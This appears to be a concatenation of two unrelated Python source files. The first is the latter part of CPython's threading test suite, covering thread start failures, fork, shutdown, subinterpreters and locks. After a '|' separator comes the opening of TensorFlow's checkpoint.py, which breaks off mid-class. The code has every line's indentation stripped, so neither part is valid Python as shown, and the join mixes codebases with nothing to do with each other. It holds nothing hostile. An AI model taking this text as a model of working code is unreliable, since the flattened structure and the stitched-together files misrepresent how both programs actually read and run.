t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
with self.assertWarnsRegex(PendingDeprecationWarning, 'use is_alive()'):
t.isAlive()
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNotIn('daemon', repr(t))
t.daemon = True
self.assertIn('daemon', repr(t))
def test_daemon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
test.support.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(11 if t.is_alive() else 10)
else:
t.join()
pid, status = os.waitpid(pid, 0)
self.assertTrue(os.WIFEXITED(status))
self.assertEqual(10, os.WEXITSTATUS(status))
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
os.waitpid(pid, 0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
def f():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
os.waitpid(pid, 0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nTrue\nTrue\n")
@requires_type_collecting
def test_main_thread_during_shutdown(self):
# bpo-31516: current_thread() should still point to the main thread
# at shutdown
code = """if 1:
import gc, threading
main_thread = threading.current_thread()
assert main_thread is threading.main_thread() # sanity check
class RefCycle:
def __init__(self):
self.cycle = self
def __del__(self):
print("GC:",
threading.current_thread() is main_thread,
threading.main_thread() is main_thread,
threading.enumerate() == [main_thread])
RefCycle()
gc.collect() # sanity check
x = RefCycle()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode()
self.assertEqual(err, b"")
self.assertEqual(data.splitlines(),
["GC: True True True"] * 2)
def test_finalization_shutdown(self):
# bpo-36402: Py_Finalize() calls threading._shutdown() which must wait
# until Python thread states of all non-daemon threads get deleted.
#
# Test similar to SubinterpThreadingTests.test_threads_join_2(), but
# test the finalization of the main interpreter.
code = """if 1:
import os
import threading
import time
import random
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_Finalize() is called.
random_sleep()
tls.x = Sleeper()
random_sleep()
threading.Thread(target=f).start()
random_sleep()
"""
rc, out, err = assert_python_ok("-c", code)
self.assertEqual(err, b"")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=5), False)
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertIsNone(t._tstate_lock)
t.join()
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
t.join()
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
@cpython_only
def test_shutdown_locks(self):
for daemon in (False, True):
with self.subTest(daemon=daemon):
event = threading.Event()
thread = threading.Thread(target=event.wait, daemon=daemon)
# Thread.start() must add lock to _shutdown_locks,
# but only for non-daemon thread
thread.start()
tstate_lock = thread._tstate_lock
if not daemon:
self.assertIn(tstate_lock, threading._shutdown_locks)
else:
self.assertNotIn(tstate_lock, threading._shutdown_locks)
# unblock the thread and join it
event.set()
thread.join()
# Thread._stop() must remove tstate_lock from _shutdown_locks.
# Daemon threads must never add it to _shutdown_locks.
self.assertNotIn(tstate_lock, threading._shutdown_locks)
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
in_f = open(os.__file__, 'rb')
stuff = in_f.read(200)
null_f = open(os.devnull, 'wb')
null_f.write(stuff)
time.sleep(random.random() / 1995)
null_f.close()
in_f.close()
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(0)
else:
os._exit(1)
else:
_, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_daemon_threads_fatal_error(self):
subinterp_code = r"""if 1:
import os
import threading
import time
def f():
# Make sure the daemon thread is still running when
# Py_EndInterpreter is called.
time.sleep(10)
threading.Thread(target=f, daemon=True).start()
"""
script = r"""if 1:
import _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
with test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
thread.join()
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
thread.join()
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
@unittest.skipUnless(sys.platform == 'darwin' and test.support.python_is_optimized(),
'test macosx problem')
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RecursionError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
@requires_type_collecting
def test_print_exception_stderr_is_none_1(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
def test_bare_raise_in_brand_new_thread(self):
def bare_raise():
raise
class Issue27558(threading.Thread):
exc = None
def run(self):
try:
bare_raise()
except Exception as exc:
self.exc = exc
thread = Issue27558()
thread.start()
thread.join()
self.assertIsNotNone(thread.exc)
self.assertIsInstance(thread.exc, RuntimeError)
# explicitly break the reference cycle to not leak a dangling thread
thread.exc = None
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
timer1.join()
timer2.join()
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
extra = {"ThreadError"}
blacklist = {'currentThread', 'activeCount'}
support.check__all__(self, threading, ('threading', '_thread'),
extra=extra, blacklist=blacklist)
class InterruptMainTests(unittest.TestCase):
def test_interrupt_main_subthread(self):
# Calling start_new_thread with a function that executes interrupt_main
# should raise KeyboardInterrupt upon completion.
def call_interrupt():
_thread.interrupt_main()
t = threading.Thread(target=call_interrupt)
with self.assertRaises(KeyboardInterrupt):
t.start()
t.join()
t.join()
def test_interrupt_main_mainthread(self):
# Make sure that if interrupt_main is called in main thread that
# KeyboardInterrupt is raised instantly.
with self.assertRaises(KeyboardInterrupt):
_thread.interrupt_main()
def test_interrupt_main_noerror(self):
handler = signal.getsignal(signal.SIGINT)
try:
# No exception should arise.
signal.signal(signal.SIGINT, signal.SIG_IGN)
_thread.interrupt_main()
signal.signal(signal.SIGINT, signal.SIG_DFL)
_thread.interrupt_main()
finally:
# Restore original handler
signal.signal(signal.SIGINT, handler)
if __name__ == "__main__":
unittest.main()
|
checkpoint.py
|
"""Utilities for saving/loading Trackable objects."""
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import abc
import collections
import functools
import glob
import os
import threading
import time
import weakref
import six
from tensorflow.core.protobuf import trackable_object_graph_pb2
from tensorflow.python.checkpoint import checkpoint_management
from tensorflow.python.checkpoint import checkpoint_options
from tensorflow.python.checkpoint import functional_saver
from tensorflow.python.checkpoint import graph_view as graph_view_lib
from tensorflow.python.checkpoint import util
from tensorflow.python.client import session as session_lib
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import executor
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.lib.io import file_io
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_io_ops as io_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import gfile
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import utils_impl
from tensorflow.python.saved_model.pywrap_saved_model import metrics
from tensorflow.python.trackable import autotrackable
from tensorflow.python.trackable import base
from tensorflow.python.trackable import data_structures
from tensorflow.python.training import py_checkpoint_reader
from tensorflow.python.training import saver as v1_saver_lib
from tensorflow.python.training.saving import saveable_object_util
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import object_identity
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import tf_export
# The callable that provide Keras default session that is needed for saving.
_SESSION_PROVIDER = None
# Captures the timestamp of the first Checkpoint instantiation or end of a write
# operation. Can be accessed by multiple Checkpoint instances.
_END_TIME_OF_LAST_WRITE = None
_END_TIME_OF_LAST_WRITE_LOCK = threading.Lock()
# API labels for cell names used in checkpoint metrics.
_CHECKPOINT_V1 = "checkpoint_v1"
_CHECKPOINT_V2 = "checkpoint_v2"
# Async thread used for asynchronous checkpoint.
_ASYNC_CHECKPOINT_THREAD = None
def _get_duration_microseconds(start_time_seconds, end_time_seconds):
if end_time_seconds < start_time_seconds:
# Avoid returning negative value in case of clock skew.
return 0
return round((end_time_seconds - start_time_seconds) * 1000000)
@tf_export("__internal__.tracking.register_session_provider", v1=[])
def register_session_provider(session_provider):
global _SESSION_PROVIDER
# TODO(scottzhu): Change it back to only allow one time setting for session
# provider once we finished the keras repo split.
# if _SESSION_PROVIDER is None:
_SESSION_PROVIDER = session_provider
def get_session():
# Prefer TF's default session since get_session from Keras has side-effects.
session = ops.get_default_session()
if session is None:
global _SESSION_PROVIDER
if _SESSION_PROVIDER is not None:
session = _SESSION_PROVIDER() # pylint: disable=not-callable
return session
def _get_checkpoint_size(prefix):
"""Calculates filesize of checkpoint based on prefix."""
size = 0
# Gather all files beginning with prefix (.index plus sharded data files).
files = glob.glob("{}*".format(prefix))
for file in files:
# Use TensorFlow's C++ FileSystem API.
size += metrics.CalculateFileSize(file)
return size
class ObjectGraphProtoPrettyPrinter(object):
"""Lazily traverses an object graph proto to pretty print names.
If no calls to `node_names` are made this object has no performance
overhead. On the other hand, it will only traverse the object graph once, so
repeated naming is cheap after the first.
"""
__slots__ = ["_object_graph_proto", "_node_name_cache"]
def __init__(self, object_graph_proto):
self._object_graph_proto = object_graph_proto
self._node_name_cache = None
@property
def node_names(self):
"""Lazily creates a mapping from node id to ("path", "to", "root")."""
if self._node_name_cache is not None:
return self._node_name_cache
path_to_root = {}
path_to_root[0] = ("(root)",)
to_visit = collections.deque([0])
while to_visit:
node_id = to_visit.popleft()
obj = self._object_graph_proto.nodes[node_id]
for child in obj.children:
if child.node_id not in path_to_root:
path_to_root[child.node_id] = (
path_to_root[node_id] + (child.local_name,))
to_visit.append(child.node_id)
node_names = {}
for node_id, path_to_root in path_to_root.items():
node_names[node_id] = ".".join(path_to_root)
for node_id, node in enumerate(self._object_graph_proto.nodes):
for slot_reference in node.slot_variables:
node_names[slot_reference.slot_variable_node_id] = (
f"{node_names[node_id]}'s state '{slot_reference.slot_name}' for "
f"{node_names[slot_reference.original_variable_node_id]}")
self._node_name_cache = node_names
return node_names
class _CheckpointRestoreCoordinatorDeleter(object):
"""Deleter to avoid overriding _CheckpointRestoreCoordinator.__del__()."""
__slots__ = [
"expect_partial", "object_graph_proto", "matched_proto_ids",
"unused_attributes"
]
def __init__(self, expect_partial, object_graph_proto, matched_proto_ids,
unused_attributes):
self.expect_partial = expect_partial
self.object_graph_proto = object_graph_proto
self.matched_proto_ids = matched_proto_ids
self.unused_attributes = unused_attributes
def set_expect_partial(self, expect_partial):
self.expect_partial = expect_partial
def __del__(self):
if self.expect_partial:
return
if logging is None:
# The logging module may have been unloaded when __del__ is called.
log_fn = print
else:
log_fn = logging.warning
unused_nodes_in_checkpoint = []
unrestored_attributes_in_object = []
pretty_printer = ObjectGraphProtoPrettyPrinter(self.object_graph_proto)
for node_id, node in enumerate(self.object_graph_proto.nodes):
if not node.attributes:
continue
if node_id not in self.matched_proto_ids:
unused_nodes_in_checkpoint.append(pretty_printer.node_names[node_id])
for node_id, attribute_name in self.unused_attributes.items():
unrestored_attributes_in_object.append((
pretty_printer.node_names[node_id], attribute_name))
if unused_nodes_in_checkpoint or unrestored_attributes_in_object:
# pylint:disable=line-too-long
log_fn("Detecting that an object or model or tf.train.Checkpoint is being"
" deleted with unrestored values. See the following logs for the "
"specific values in question. To silence these warnings, use "
"`status.expect_partial()`. See "
"https://www.tensorflow.org/api_docs/python/tf/train/Checkpoint#restore"
"for details about the status object returned by the restore "
"function.")
# pylint:enable=line-too-long
for node_path in unused_nodes_in_checkpoint:
log_fn("Value in checkpoint could not be found in the restored object: "
f"{node_path}")
for node_path, attr in unrestored_attributes_in_object:
log_fn("An attribute in the restored object could not be found in the "
f"checkpoint. Object: {node_path}, attribute: {attr}")
class _CheckpointRestoreCoordinator(object):
"""Holds the status of an object-based checkpoint load."""
def __init__(self, object_graph_proto, save_path, save_path_tensor, reader,
restore_op_cache, graph_view, options, saveables_cache):
"""Specify the checkpoint being loaded.
Args:
object_graph_proto: The TrackableObjectGraph protocol buffer associated
with this checkpoint.
save_path: A string, the path to the checkpoint, as returned by
`tf.train.latest_checkpoint`.
save_path_tensor: A string `Tensor` which contains or will be fed the save
path.
reader: A `CheckpointReader` for `save_path`. If None,
`_CheckpointRestoreCoordinator` will initialize one itself.
restore_op_cache: A dictionary shared between
`_CheckpointRestoreCoordinator`s for the same Python objects, used to
look up restore ops by name to avoid re-creating them across multiple
`restore()` calls.
graph_view: A graph_view_lib.ObjectGraphView object for the restored
objects.
options: A CheckpointOptions object.
saveables_cache: An optional cache storing previously created
SaveableObjects created for each Trackable. Maps Trackables to a
dictionary of attribute names to Trackable.
"""
self.options = options
self.object_graph_proto = object_graph_proto
self.restore_uid = ops.uid()
# Maps from proto ids to lists of attributes which were in the checkpoint
# but not loaded into any object, for error checking.
